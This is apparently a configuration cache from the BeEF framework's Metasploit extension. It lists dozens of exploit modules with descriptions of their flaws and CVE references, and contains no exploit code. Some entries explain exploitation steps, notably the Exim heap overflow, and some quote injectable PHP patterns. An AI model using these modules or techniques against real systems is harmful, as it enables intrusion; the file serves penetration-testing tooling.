beef/extensions/metasploit/msf-exploits.cache

---
msf_rpc_cmsd_opcode21:
enable: true
msf: true
msf_key: aix/rpc_cmsd_opcode21
name: AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow vulnerability in opcode 21 handled by\n\
\t\t\t\trpc.cmsd on AIX. By making a request with a long string passed to the first\n\
\t\t\t\targument of the \"rtable_create\" RPC, a stack based buffer overflow occurs. This\n\
\t\t\t\tleads to arbitrary code execution.\n\n\
\t\t\t\tNOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where\n\
\t\t\t\tfurther attempts are not possible.\n\
\t\t\t"
authors:
- - CVE
- 2009-3699
- - OSVDB
- "58726"
- - BID
- "36615"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825
- - URL
- http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc
path: extensions/metasploit/
class: Msf_module
msf_rpc_ttdbserverd_realpath:
enable: true
msf: true
msf_key: aix/rpc_ttdbserverd_realpath
name: ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow vulnerability in _tt_internal_realpath\n\
\t\t\t\tfunction of the ToolTalk database server (rpc.ttdbserverd).\n\
\t\t\t"
authors:
- - CVE
- 2009-2727
- - OSVDB
- "55151"
path: extensions/metasploit/
class: Msf_module
msf_tagprinter_exec:
enable: true
msf: true
msf_key: irix/lpd/tagprinter_exec
name: Irix LPD tagprinter Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution flaw in\n\
\t\t\t\tthe in.lpd service shipped with all versions of Irix.\n\
\t\t\t"
authors:
- - CVE
- 2001-0800
- - OSVDB
- "8573"
- - URL
- http://www.lsd-pl.net/code/IRIX/irx_lpsched.c
path: extensions/metasploit/
class: Msf_module
msf_lsass_cifs:
enable: true
msf: true
msf_key: netware/smb/lsass_cifs
name: Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the NetWare CIFS.NLM driver.\n\
\t\t\t\tSince the driver runs in the kernel space, a failed exploit attempt can\n\
\t\t\t\tcause the OS to reboot.\n\
\t\t\t"
authors:
- - CVE
- 2005-2852
- - OSVDB
- "12790"
path: extensions/metasploit/
class: Msf_module
msf_pkernel_callit:
enable: true
msf: true
msf_key: netware/sunrpc/pkernel_callit
name: NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.\n\
\t\t\t\tPKERNEL.NLM is installed by default on all NetWare servers to support NFS.\n\
\t\t\t\tThe PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can\n\
\t\t\t\tcause the operating system to reboot.\n\
\t\t\t"
authors:
- - BID
- "36564"
- - OSVDB
- "58447"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-09-067/
path: extensions/metasploit/
class: Msf_module
msf_clamav_milter_blackhole:
enable: true
msf: true
msf_key: unix/smtp/clamav_milter_blackhole
name: ClamAV Milter Blackhole-Mode Remote Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'\n\
\t\t\t\t(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.\n\
\t\t\t\tWhen implemented with black hole mode enabled, it is possible to execute\n\
\t\t\t\tcommands remotely due to an insecure popen call.\n\
\t\t\t"
authors:
- - CVE
- 2007-4560
- - OSVDB
- "36909"
- - BID
- "25439"
- - URL
- http://www.milw0rm.com/exploits/4761
path: extensions/metasploit/
class: Msf_module
msf_exim4_string_format:
enable: true
msf: true
msf_key: unix/smtp/exim4_string_format
name: Exim4 <= 4.69 string_format Function Heap Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a heap buffer overflow within versions of Exim prior to\n\
\t\t\t\tversion 4.69. By sending a specially crafted message, an attacker can corrupt the\n\
\t\t\t\theap and execute arbitrary code with the privileges of the Exim daemon.\n\n\
\t\t\t\tThe root cause is that no check is made to ensure that the buffer is not full\n\
\t\t\t\tprior to handling '%s' format specifiers within the 'string_vformat' function.\n\
\t\t\t\tIn order to trigger this issue, we get our message rejected by sending a message\n\
\t\t\t\tthat is too large. This will call into log_write to log rejection headers (which\n\
\t\t\t\tis a default configuration setting). After filling the buffer, a long header\n\
\t\t\t\tstring is sent. In a successful attempt, it overwrites the ACL for the 'MAIL\n\
\t\t\t\tFROM' command. By sending a second message, the string we sent will be evaluated\n\
\t\t\t\twith 'expand_string' and arbitrary shell commands can be executed.\n\n\
\t\t\t\tIt is likely that this issue could also be exploited using other techniques such\n\
\t\t\t\tas targeting in-band heap management structures, or perhaps even function pointers\n\
\t\t\t\tstored in the heap. However, these techniques would likely be far more platform\n\
\t\t\t\tspecific, more complicated, and less reliable.\n\n\
\t\t\t\tThis bug was originally found and reported in December 2008, but was not\n\
\t\t\t\tproperly handled as a security issue. Therefore, there was a 2 year lag time\n\
\t\t\t\tbetween when the issue was fixed and when it was discovered being exploited\n\
\t\t\t\tin the wild. At that point, the issue was assigned a CVE and began being\n\
\t\t\t\taddressed by downstream vendors.\n\n\
\t\t\t\tAn additional vulnerability, CVE-2010-4345, was also used in the attack that\n\
\t\t\t\tled to the discovery of the danger of this bug. This bug allows a local user to\n\
\t\t\t\tgain root privileges from the Exim user account. If the Perl interpreter is\n\
\t\t\t\tfound on the remote system, this module will automatically exploit the\n\
\t\t\t\tsecondary bug as well to get root.\n\
\t\t\t"
authors:
- - CVE
- 2010-4344
- - OSVDB
- "69685"
- - BID
- "45308"
- - CVE
- 2010-4345
- - BID
- "45341"
- - URL
- http://seclists.org/oss-sec/2010/q4/311
- - URL
- http://www.gossamer-threads.com/lists/exim/dev/89477
- - URL
- http://bugs.exim.org/show_bug.cgi?id=787
- - URL
- http://git.exim.org/exim.git/commitdiff/24c929a27415c7cfc7126c47e4cad39acf3efa6b
path: extensions/metasploit/
class: Msf_module
msf_spamassassin_exec:
enable: true
msf: true
msf_key: unix/misc/spamassassin_exec
name: SpamAssassin spamd Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a flaw in the SpamAssassin spamd service by specifying\n\
\t\t\t\ta malicious vpopmail User header, when running with vpopmail and paranoid\n\
\t\t\t\tmodes enabled (non-default). Versions prior to v3.1.3 are vulnerable.\n\
\t\t\t"
authors:
- - CVE
- 2006-2447
- - OSVDB
- "26177"
- - BID
- "18290"
- - URL
- http://spamassassin.apache.org/advisories/cve-2006-2447.txt
path: extensions/metasploit/
class: Msf_module
msf_zabbix_agent_exec:
enable: true
msf: true
msf_key: unix/misc/zabbix_agent_exec
name: Zabbix Agent net.tcp.listen Command Injection
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a metacharacter injection vulnerability\n\
\t\t\t\tin the FreeBSD and Solaris versions of the Zabbix agent. This flaw\n\
\t\t\t\tcan only be exploited if the attacker can hijack the IP address\n\
\t\t\t\tof an authorized server (as defined in the configuration file).\n\
\t\t\t"
authors:
- - CVE
- 2009-4502
- - OSVDB
- "60956"
- - URL
- https://support.zabbix.com/browse/ZBX-1032
path: extensions/metasploit/
class: Msf_module
msf_distcc_exec:
enable: true
msf: true
msf_key: unix/misc/distcc_exec
name: DistCC Daemon Command Execution
category: Metasploit
description: "\n\
\t\t\t\tThis module uses a documented security weakness to execute\n\
\t\t\t\tarbitrary commands on any system running distccd.\n\n\
\t\t\t"
authors:
- - CVE
- 2004-2687
- - OSVDB
- "13378"
- - URL
- http://distcc.samba.org/security.html
path: extensions/metasploit/
class: Msf_module
msf_vsftpd_234_backdoor:
enable: true
msf: true
msf_key: unix/ftp/vsftpd_234_backdoor
name: VSFTPD v2.3.4 Backdoor Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a malicious backdoor that was added to the VSFTPD download\n\
\t\t\t\t\tarchive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between\n\
\t\t\t\t\tJune 30th 2011 and July 1st 2011 according to the most recent information\n\
\t\t\t\t\tavailable. This backdoor was removed on July 3rd 2011.\n\
\t\t\t"
authors:
- - OSVDB
- "73573"
- - URL
- http://pastebin.com/AetT9sS5
- - URL
- http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
path: extensions/metasploit/
class: Msf_module
msf_proftpd_133c_backdoor:
enable: true
msf: true
msf_key: unix/ftp/proftpd_133c_backdoor
name: ProFTPD-1.3.3c Backdoor Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a malicious backdoor that was added to the\n\
\t\t\t\tProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz]\n\
\t\t\t\tarchive between November 28th 2010 and 2nd December 2010.\n\
\t\t\t"
authors:
- - OSVDB
- "69562"
- - BID
- "45150"
- - URL
- http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org
path: extensions/metasploit/
class: Msf_module
msf_contentkeeperweb_mimencode:
enable: true
msf: true
msf_key: unix/http/contentkeeperweb_mimencode
name: ContentKeeper Web Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the ContentKeeper Web Appliance. Versions prior\n\
\t\t\t\tto 125.10 are affected. This module exploits a combination of weaknesses\n\
\t\t\t\tto enable remote command execution as the Apache user. By setting\n\
\t\t\t\tSkipEscalation to false, this module will attempt to setuid the bash shell.\n\
\t\t\t"
authors:
- - OSVDB
- "54551"
- - OSVDB
- "54552"
- - URL
- http://www.aushack.com/200904-contentkeeper.txt
path: extensions/metasploit/
class: Msf_module
msf_unreal_ircd_3281_backdoor:
enable: true
msf: true
msf_key: unix/irc/unreal_ircd_3281_backdoor
name: UnrealIRCD 3.2.8.1 Backdoor Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a malicious backdoor that was added to the\n\
\t\t\t\tUnreal IRCD 3.2.8.1 download archive. This backdoor was present in the\n\
\t\t\t\tUnreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.\n\
\t\t\t"
authors:
- - CVE
- 2010-2075
- - OSVDB
- "65445"
- - URL
- http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
path: extensions/metasploit/
class: Msf_module
msf_awstatstotals_multisort:
enable: true
msf: true
msf_key: unix/webapp/awstatstotals_multisort
name: AWStats Totals =< v1.14 multisort Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\t\tAWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.\n\
\t\t\t"
authors:
- - CVE
- 2008-3922
- - OSVDB
- "47807"
- - BID
- "30856"
- - URL
- http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt
path: extensions/metasploit/
class: Msf_module
msf_coppermine_piceditor:
enable: true
msf: true
msf_key: unix/webapp/coppermine_piceditor
name: Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the picEditor.php script of Coppermine\n\
\t\t\t\tPhoto Gallery. When configured to use the ImageMagick library, the 'quality', 'angle',\n\
\t\t\t\tand 'clipval' parameters are not properly escaped before being passed to the PHP\n\
\t\t\t\t'exec' command.\n\n\
\t\t\t\tIn order to reach the vulnerable 'exec' call, the input must pass several validation\n\
\t\t\t\tsteps.\n\n\
\t\t\t\tThe vulnerabilities actually reside in the following functions:\n\n\
\t\t\t\timage_processor.php: rotate_image(...)\n\
\t\t\t\tinclude/imageObjectIM.class.php: imageObject::cropImage(...)\n\
\t\t\t\tinclude/imageObjectIM.class.php: imageObject::rotateImage(...)\n\
\t\t\t\tinclude/imageObjectIM.class.php: imageObject::resizeImage(...)\n\
\t\t\t\tinclude/picmgmt.inc.php: resize_image(...)\n\n\
\t\t\t\tNOTE: Use of the ImageMagick library is a non-default option. However, a user can\n\
\t\t\t\tspecify its use at installation time.\n\
\t\t\t"
authors:
- - CVE
- 2008-0506
- - OSVDB
- "41676"
- - URL
- http://www.exploit-db.com/exploits/5019
- - URL
- http://forum.coppermine-gallery.net/index.php?topic=50103.0
path: extensions/metasploit/
class: Msf_module
msf_php_vbulletin_template:
enable: true
msf: true
msf_key: unix/webapp/php_vbulletin_template
name: vBulletin misc.php Template Name Arbitrary Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary PHP code execution flaw in\n\
\t\t\t\tthe vBulletin web forum software. This vulnerability is only\n\
\t\t\t\tpresent when the \"Add Template Name in HTML Comments\" option\n\
\t\t\t\tis enabled. All versions of vBulletin prior to 3.0.7 are\n\
\t\t\t\taffected.\n\
\t\t\t"
authors:
- - CVE
- 2005-0511
- - BID
- "12622"
- - OSVDB
- "14047"
path: extensions/metasploit/
class: Msf_module
msf_sphpblog_file_upload:
enable: true
msf: true
msf_key: unix/webapp/sphpblog_file_upload
name: Simple PHP Blog <= 0.4.0 Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module combines three separate issues within The Simple PHP Blog (<= 0.4.0)\n\
\t\t\t\tapplication to upload arbitrary data and thus execute a shell. The first\n\
\t\t\t\tvulnerability exposes the hash file (password.txt) to unauthenticated users.\n\
\t\t\t\tThe second vulnerability lies within the image upload system provided to\n\
\t\t\t\tlogged-in users; there is no image validation function in the blogger to\n\
\t\t\t\tprevent an authenticated user from uploading any file type. The third\n\
\t\t\t\tvulnerability occurs within the blog comment functionality, allowing\n\
\t\t\t\tarbitrary files to be deleted.\n\
\t\t\t"
authors:
- - CVE
- 2005-2733
- - OSVDB
- "19012"
- - BID
- "14667"
- - URL
- http://www.milw0rm.com/exploits/1191
path: extensions/metasploit/
class: Msf_module
msf_awstats_migrate_exec:
enable: true
msf: true
msf_key: unix/webapp/awstats_migrate_exec
name: AWStats migrate Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\tAWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based\n\
\t\t\t\tpayloads are recommended with this module. The vulnerability is only\n\
\t\t\t\tpresent when AllowToUpdateStatsFromBrowser is enabled in the AWstats\n\
\t\t\t\tconfiguration file (non-default).\n\
\t\t\t"
authors:
- - CVE
- 2006-2237
- - OSVDB
- "25284"
- - BID
- "17844"
- - URL
- http://awstats.sourceforge.net/awstats_security_news.php
- - URL
- http://www.milw0rm.com/exploits/1755
path: extensions/metasploit/
class: Msf_module
msf_oscommerce_filemanager:
enable: true
msf: true
msf_key: unix/webapp/oscommerce_filemanager
name: osCommerce 2.2 Arbitrary PHP Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tosCommerce is a popular open source E-Commerce application.\n\
\t\t\t\tThe admin console contains a file management utility that\n\
\t\t\t\tallows administrators to upload, download, and edit files.\n\
\t\t\t\tThis could be abused to allow unauthenticated attackers to\n\
\t\t\t\texecute arbitrary code with the permissions of the\n\
\t\t\t\twebserver.\n\
\t\t\t"
authors:
- - OSVDB
- "60018"
- - URL
- http://www.milw0rm.com/exploits/9556
path: extensions/metasploit/
class: Msf_module
msf_php_eval:
enable: true
msf: true
msf_key: unix/webapp/php_eval
name: Generic PHP Code eval
category: Metasploit
description: "\n\
\t\t\t\tExploits things like <?php eval($_REQUEST['evalme']); ?>\n\
\t\t\t\tIt is likely that HTTP evasion options will break this exploit.\n\
\t\t\t"
authors: []
path: extensions/metasploit/
class: Msf_module
msf_squirrelmail_pgp_plugin:
enable: true
msf: true
msf_key: unix/webapp/squirrelmail_pgp_plugin
name: SquirrelMail PGP Plugin command execution (SMTP)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command execution vulnerability in the\n\
\t\t\t\tPGP plugin of SquirrelMail. This flaw was found while quickly\n\
\t\t\t\tgrepping the code after release of some information at\n\
\t\t\t\thttp://www.wslabi.com/. Later, iDefense published an advisory ....\n\n\
\t\t\t\tReading an email in SquirrelMail with the PGP plugin activated\n\
\t\t\t\tis enough to compromise the underlying server.\n\n\
\t\t\t\tOnly \"cmd/unix/generic\" payloads were tested.\n\
\t\t\t"
authors:
- - CVE
- 2003-0990
- - OSVDB
- "3178"
- - URL
- http://lists.immunitysec.com/pipermail/dailydave/2007-July/004456.html
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=330
- - URL
- http://www.wslabi.com/wabisabilabi/initPublishedBid.do?
path: extensions/metasploit/
class: Msf_module
msf_twiki_history:
enable: true
msf: true
msf_key: unix/webapp/twiki_history
name: TWiki History TWikiUsers rev Parameter Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the history component of TWiki.\n\
\t\t\t\tBy passing a 'rev' parameter containing shell metacharacters to the TWikiUsers\n\
\t\t\t\tscript, an attacker can execute arbitrary OS commands.\n\
\t\t\t"
authors:
- - CVE
- 2005-2877
- - OSVDB
- "19403"
- - BID
- "14834"
- - URL
- http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev
path: extensions/metasploit/
class: Msf_module
msf_dogfood_spell_exec:
enable: true
msf: true
msf_key: unix/webapp/dogfood_spell_exec
name: Dogfood CRM spell.php Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a previously unpublished vulnerability in the\n\
\t\t\t\tDogfood CRM mail function which is vulnerable to command injection\n\
\t\t\t\tin the spell check feature. Because of character restrictions, this\n\
\t\t\t\texploit works best with the double-reverse telnet payload. This\n\
\t\t\t\tvulnerability was discovered by LSO and affects v2.0.10.\n\
\t\t\t"
authors:
- - OSVDB
- "54707"
- - URL
- http://downloads.sourceforge.net/dogfood/
path: extensions/metasploit/
class: Msf_module
msf_openx_banner_edit:
enable: true
msf: true
msf_key: unix/webapp/openx_banner_edit
name: OpenX banner-edit.php File Upload PHP Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the OpenX advertising software.\n\
\t\t\t\tIn versions prior to version 2.8.2, authenticated users can upload files\n\
\t\t\t\twith arbitrary extensions to be used as banner creative content. By uploading\n\
\t\t\t\ta file with a PHP extension, an attacker can execute arbitrary PHP code.\n\n\
\t\t\t\tNOTE: The file must also return either \"png\", \"gif\", or \"jpeg\" as its image\n\
\t\t\t\ttype as returned from the PHP getimagesize() function.\n\
\t\t\t"
authors:
- - CVE
- 2009-4098
- - OSVDB
- "60499"
- - BID
- "37110"
- - URL
- http://archives.neohapsis.com/archives/bugtraq/2009-11/0166.html
- - URL
- https://developer.openx.org/jira/browse/OX-5747
- - URL
- http://www.openx.org/docs/2.8/release-notes/openx-2.8.2
- - URL
- http://php.net/manual/en/function.getimagesize.php
- - URL
- http://gynvael.coldwind.pl/?id=223
- - URL
- http://gynvael.coldwind.pl/?id=224
- - URL
- http://gynvael.coldwind.pl/?id=235
- - URL
- http://programming.arantius.com/the+smallest+possible+gif
- - URL
- http://stackoverflow.com/questions/2253404/what-is-the-smallest-valid-jpeg-file-size-in-bytes
path: extensions/metasploit/
class: Msf_module
msf_tikiwiki_jhot_exec:
enable: true
msf: true
msf_key: unix/webapp/tikiwiki_jhot_exec
name: TikiWiki jhot Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tTikiWiki contains a flaw that may allow a malicious user to execute\n\
\t\t\t\tarbitrary PHP code. The issue is triggered due to the jhot.php script\n\
\t\t\t\tnot correctly verifying uploaded files. It is possible that the flaw\n\
\t\t\t\tmay allow arbitrary PHP code execution by uploading a malicious PHP\n\
\t\t\t\tscript resulting in a loss of integrity.\n\n\
\t\t\t\tThe vulnerability was reported in Tikiwiki version 1.9.4.\n\
\t\t\t"
authors:
- - CVE
- 2006-4602
- - OSVDB
- "28456"
- - BID
- "19819"
- - URL
- http://secunia.com/advisories/21733/
path: extensions/metasploit/
class: Msf_module
msf_qtss_parse_xml_exec:
enable: true
msf: true
msf_key: unix/webapp/qtss_parse_xml_exec
name: QuickTime Streaming Server parse_xml.cgi Remote Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThe QuickTime Streaming Server contains a CGI script that is vulnerable\n\
\t\t\t\tto metacharacter injection, allowing arbitrary commands to be executed as root.\n\
\t\t\t"
authors:
- - OSVDB
- "10562"
- - BID
- "6954"
- - CVE
- 2003-0050
path: extensions/metasploit/
class: Msf_module
msf_phpbb_highlight:
enable: true
msf: true
msf_key: unix/webapp/phpbb_highlight
name: phpBB viewtopic.php Arbitrary Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits two arbitrary PHP code execution flaws in the\n\
\t\t\t\tphpBB forum system. The problem is that the 'highlight' parameter\n\
\t\t\t\tin the 'viewtopic.php' script is not verified properly and will\n\
\t\t\t\tallow an attacker to inject arbitrary code via preg_replace().\n\n\
\t\t\t\tThis vulnerability was introduced in revision 3076, and finally\n\
\t\t\t\tfixed in revision 5166. According to the \"tags\" within their tree,\n\
\t\t\t\tthis corresponds to versions 2.0.4 through 2.0.15 (inclusive).\n\
\t\t\t"
authors:
- - CVE
- 2005-2086
- - CVE
- 2004-1315
- - OSVDB
- "11719"
- - OSVDB
- "17613"
- - BID
- "14086"
- - BID
- "10701"
path: extensions/metasploit/
class: Msf_module
msf_php_include:
enable: true
msf: true
msf_key: unix/webapp/php_include
name: PHP Remote File Include Generic Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module can be used to exploit any generic PHP file include vulnerability,\n\
\t\t\t\twhere the application includes code like the following:\n\n\
\t\t\t\t<?php include($_GET['path']); ?>\n\
\t\t\t"
authors: []
path: extensions/metasploit/
class: Msf_module
msf_nagios3_statuswml_ping:
enable: true
msf: true
msf_key: unix/webapp/nagios3_statuswml_ping
name: Nagios3 statuswml.cgi Ping Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module abuses a metacharacter injection vulnerability in the\n\
\t\t\t\tNagios3 statuswml.cgi script. This flaw is triggered when shell\n\
\t\t\t\tmetacharacters are present in the parameters to the ping and\n\
\t\t\t\ttraceroute commands.\n\
\t\t\t"
authors:
- - CVE
- 2009-2288
- - OSVDB
- "55281"
path: extensions/metasploit/
class: Msf_module
msf_google_proxystylesheet_exec:
enable: true
msf: true
msf_key: unix/webapp/google_proxystylesheet_exec
name: Google Appliance ProxyStyleSheet Command Execution
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a feature in the Saxon XSLT parser used by\n\
\t\t\tthe Google Search Appliance. This feature allows for arbitrary\n\
\t\t\tjava methods to be called. Google released a patch and advisory to\n\
\t\t\ttheir client base in August of 2005 (GA-2005-08-m). The target appliance\n\
\t\t\tmust be able to connect back to your machine for this exploit to work.\n\
\t\t\t"
authors:
- - CVE
- 2005-3757
- - OSVDB
- "20981"
- - BID
- "15509"
path: extensions/metasploit/
class: Msf_module
msf_php_wordpress_lastpost:
enable: true
msf: true
msf_key: unix/webapp/php_wordpress_lastpost
name: WordPress cache_lastpostdate Arbitrary Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary PHP code execution flaw in the WordPress\n\
\t\t\t\tblogging software. This vulnerability is only present when the PHP 'register_globals'\n\
\t\t\t\toption is enabled (common for hosting providers). All versions of WordPress prior to\n\
\t\t\t\t1.5.1.3 are affected.\n\
\t\t\t"
authors:
- - CVE
- 2005-2612
- - OSVDB
- "18672"
- - BID
- "14533"
path: extensions/metasploit/
class: Msf_module
msf_twiki_search:
enable: true
msf: true
msf_key: unix/webapp/twiki_search
name: TWiki Search Function Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the search component of TWiki.\n\
\t\t\t\tBy passing a 'search' parameter containing shell metacharacters to the\n\
\t\t\t\t'WebSearch' script, an attacker can execute arbitrary OS commands.\n\
\t\t\t"
authors:
- - CVE
- 2004-1037
- - OSVDB
- "11714"
- - BID
- "11674"
- - URL
- http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch
path: extensions/metasploit/
class: Msf_module
msf_phpmyadmin_config:
enable: true
msf: true
msf_key: unix/webapp/phpmyadmin_config
name: PhpMyAdmin Config File Code Injection
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in PhpMyAdmin's setup\n\
\t\t\t\tfeature which allows an attacker to inject arbitrary PHP\n\
\t\t\t\tcode into a configuration file. The original advisory says\n\
\t\t\t\tthe vulnerability is present in phpMyAdmin versions 2.11.x\n\
\t\t\t\t< 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on\n\
\t\t\t\t3.0.1.1.\n\n\
\t\t\t\tThe file where our payload is written\n\
\t\t\t\t(phpMyAdmin/config/config.inc.php) is not directly used by\n\
\t\t\t\tthe system, so it may be a good idea to either delete it or\n\
\t\t\t\tcopy the running config (phpMyAdmin/config.inc.php) over it\n\
\t\t\t\tafter successful exploitation.\n\
\t\t\t"
authors:
- - CVE
- 2009-1151
- - OSVDB
- "53076"
- - URL
- http://www.milw0rm.com/exploits/8921
- - URL
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
- - URL
- http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
path: extensions/metasploit/
class: Msf_module
msf_generic_exec:
enable: true
msf: true
msf_key: unix/webapp/generic_exec
name: Generic Web Application Unix Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module can be used to exploit any generic command execution vulnerability\n\
\t\t\t\tfor CGI applications on Unix-like platforms. To use this module, specify the\n\
\t\t\t\tCMDURI path, replacing the command itself with XXcmdXX. This module is currently\n\
\t\t\t\tlimited to forms vulnerable through GET requests with query parameters.\n\
\t\t\t"
authors: []
path: extensions/metasploit/
class: Msf_module
msf_citrix_access_gateway_exec:
enable: true
msf: true
msf_key: unix/webapp/citrix_access_gateway_exec
name: Citrix Access Gateway Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThe Citrix Access Gateway provides support for multiple authentication types.\n\
\t\t\t\tWhen utilizing the external legacy NTLM authentication module known as\n\
\t\t\t\tntlm_authenticator the Access Gateway spawns the Samba 'samedit' command\n\
\t\t\t\tline utility to verify a user's identity and password. By embedding shell\n\
\t\t\t\tmetacharacters in the web authentication form it is possible to execute\n\
\t\t\t\tarbitrary commands on the Access Gateway.\n\
\t\t\t"
authors:
- - CVE
- 2010-4566
- - OSVDB
- "70099"
- - BID
- "45402"
- - URL
- http://www.vsecurity.com/resources/advisory/20101221-1/
path: extensions/metasploit/
class: Msf_module
msf_cakephp_cache_corruption:
enable: true
msf: true
msf_key: unix/webapp/cakephp_cache_corruption
name: CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tCakePHP is a popular PHP framework for building web applications.\n\
\t\t\t\tThe Security component of CakePHP is vulnerable to an unserialize attack which\n\
\t\t\t\tcould be abused to allow unauthenticated attackers to execute arbitrary\n\
\t\t\t\tcode with the permissions of the webserver.\n\
\t\t\t"
authors:
- - OSVDB
- "69352"
- - CVE
- 2010-4335
- - BID
- "44852"
- - URL
- http://packetstormsecurity.org/files/view/95847/burnedcake.py.txt
path: extensions/metasploit/
class: Msf_module
msf_oracle_vm_agent_utl:
enable: true
msf: true
msf_key: unix/webapp/oracle_vm_agent_utl
name: Oracle VM Server Virtual Server Agent Command Injection
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command injection flaw within Oracle's VM Server\n\
\t\t\t\tVirtual Server Agent (ovs-agent) service.\n\n\
\t\t\t\tBy including shell meta characters within the second parameter to the 'utl_test_url'\n\
\t\t\t\tXML-RPC methodCall, an attacker can execute arbitrary commands. The service\n\
\t\t\t\ttypically runs with root privileges.\n\n\
\t\t\t\tNOTE: Valid credentials are required to trigger this vulnerability. The username\n\
\t\t\t\tappears to be hardcoded as 'oracle', but the password is set by the administrator\n\
\t\t\t\tat installation time.\n\
\t\t\t"
authors:
- - CVE
- 2010-3585
- - OSVDB
- "68797"
- - BID
- "44047"
path: extensions/metasploit/
class: Msf_module
msf_tikiwiki_graph_formula_exec:
enable: true
msf: true
msf_key: unix/webapp/tikiwiki_graph_formula_exec
name: TikiWiki tiki-graph_formula Remote PHP Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tTikiWiki (<= 1.9.8) contains a flaw that may allow a remote\n\
\t\t\t\tattacker to execute arbitrary PHP code. The issue is due to\n\
\t\t\t\t'tiki-graph_formula.php' script not properly sanitizing user\n\
\t\t\t\tinput supplied to create_function(), which may allow a remote\n\
\t\t\t\tattacker to execute arbitrary PHP code resulting in a loss of\n\
\t\t\t\tintegrity.\n\
\t\t\t"
authors:
- - CVE
- 2007-5423
- - OSVDB
- "40478"
- - BID
- "26006"
path: extensions/metasploit/
class: Msf_module
msf_guestbook_ssi_exec:
enable: true
msf: true
msf_key: unix/webapp/guestbook_ssi_exec
name: Matt Wright guestbook.pl Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\tThe Matt Wright guestbook.pl <= v2.3.1 CGI script contains\n\
\t\t\t\ta flaw that may allow arbitrary command execution. The vulnerability\n\
\t\t\t\trequires that HTML posting is enabled in the guestbook.pl script, and\n\
\t\t\t\tthat the web server must have the Server-Side Include (SSI) script\n\
\t\t\t\thandler enabled for the '.html' file type. By combining the script\n\
\t\t\t\tweakness with non-default server configuration, it is possible to exploit\n\
\t\t\t\tthis vulnerability successfully.\n\
\t\t\t"
authors:
- - CVE
- 1999-1053
- - OSVDB
- "84"
- - BID
- "776"
path: extensions/metasploit/
class: Msf_module
